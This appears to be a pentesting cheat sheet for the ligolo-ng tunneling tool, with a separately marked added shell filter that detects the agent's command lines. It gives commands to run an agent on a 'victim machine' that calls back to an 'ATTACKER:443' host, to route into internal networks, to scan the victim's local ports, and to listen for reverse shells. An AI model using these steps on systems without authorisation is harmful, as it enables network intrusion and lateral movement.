Ligolo
Ligolo allows you to access distant networks over a client/server connection, using tun interfaces.
Build
git clone https://github.com/nicocha30/ligolo-ng /opt/git/ligolo
CMD='cd /src;'
CMD+='env GOARCH=amd64 CGO_ENABLED=0 go build -o /w/ligolo cmd/agent/main.go;'
CMD+='go build -o proxy cmd/proxy/main.go;'
CMD+='env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc go build -o /w/ligolo.exe cmd/agent/main.go;'
docker run -v /var/www/html/:/w -v /opt/git/ligolo:/src/ --rm -it golang /bin/bash -c "$CMD"
Start
Start the ligolo server side (proxy) on your machine; it will print the certificate fingerprint.
sudo /opt/git/ligolo/proxy -selfcert -laddr 0.0.0.0:443
Start the client side (agent) on the victim machine, using either a bind or a reverse connection.
# Reverse connection
./ligolo -connect ATTACKER:443 -accept-fingerprint REPLACEWITHFINGERPRINT
# Or bind connection
./ligolo -bind VICTIM:443
# Then connect to victim from server
ligolo-ng » connect_agent --ip VICTIM:443
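On the host where the agent runs, the command lines above leave a recognisable argument pattern in process telemetry. The following is an added example, not part of the original page or the ligolo-ng project: a shell filter that flags that pattern. The function names and sample lines are constructed, and it assumes the agent uses Go's standard flag parsing (`-flag`/`--flag`, `-flag value`/`-flag=value`).

```shell
#!/bin/sh
# Added example (hypothetical names; sample data constructed for illustration).
# Reads one process command line per line and reports those whose arguments
# match the agent invocations shown above. Matching is on argument shape, not
# on the binary name, which may differ from "ligolo".

ligolo_agent_hits() {
  awk '
    function hostport(s) { return s ~ /^[^ :]+:[0-9]+$/ }
    {
      connect = ""; bind = ""; fp = 0
      for (i = 2; i <= NF; i++) {
        arg = $i; val = ""
        sub(/^--/, "-", arg)            # Go flag parsing treats --flag as -flag
        eq = index(arg, "=")
        if (eq > 0) {                   # -flag=value form
          val = substr(arg, eq + 1); arg = substr(arg, 1, eq - 1)
        } else if (i < NF) {            # -flag value form
          val = $(i + 1)
        }
        if (arg == "-connect" && hostport(val)) connect = val
        else if (arg == "-bind" && hostport(val)) bind = val
        else if (arg == "-accept-fingerprint" && val != "") fp = 1
      }
      # Reverse mode: both flags present. Bind mode: weaker signal, triage it.
      if (connect != "" && fp) print "reverse\t" connect "\t" $0
      else if (bind != "") print "bind\t" bind "\t" $0
    }'
}

# Constructed sample input (not real telemetry).
sample_cmdlines() {
  cat <<'EOF'
/tmp/ligolo -connect 203.0.113.10:443 -accept-fingerprint AABBCCDD
C:\Users\Public\svc.exe --connect=203.0.113.10:443 --accept-fingerprint=AABBCCDD
/usr/local/bin/upd -bind 0.0.0.0:443
/usr/bin/curl --connect-timeout 5 https://example.org/
/usr/sbin/sshd -D
EOF
}

sample_cmdlines | ligolo_agent_hits
```

Output is tab-separated: mode, endpoint, original command line. The `-bind` match alone is a weak signal, since other tools use the same flag name.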
Route
You can now add a route on your attacker machine.
For each ligolo session tunnel you need to add a new interface.
Ligolo has its own interface features, but I prefer to use system commands, which also work when ligolo is started as a regular user.
Here is an example that adds a ligolo1 interface for the user "user", with a 172.16.1.0/24 route:
sudo ip tuntap add user user mode tun ligolo1
sudo ip link set ligolo1 up
sudo ip route add 172.16.1.0/24 dev ligolo1
Then start the tunnel in ligolo:
ligolo-ng » session
? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
[Agent : user@target] » start --tun ligolo1
Use interface_list to list interfaces and their routes.
If you need to remove the interface:
sudo ip link set ligolo1 down
sudo ip tuntap del dev ligolo1
If you need to remove the route:
sudo ip route del 172.16.1.0/24
If you need to expose the targeted machine's local ports, use the 240.0.0.1 IP:
sudo ip route add 240.0.0.1/32 dev ligolo1
nmap 240.0.0.1 -sV
sudo ip route del 240.0.0.1/32
Listener
Ligolo allows you to bind distant ports and redirect traffic back to your machine (or anywhere else).
You can use it to chain ligolo pivots, or to listen for reverse shell connections in a specific network:
ligolo-ng » session
? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
[Agent : user@target] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp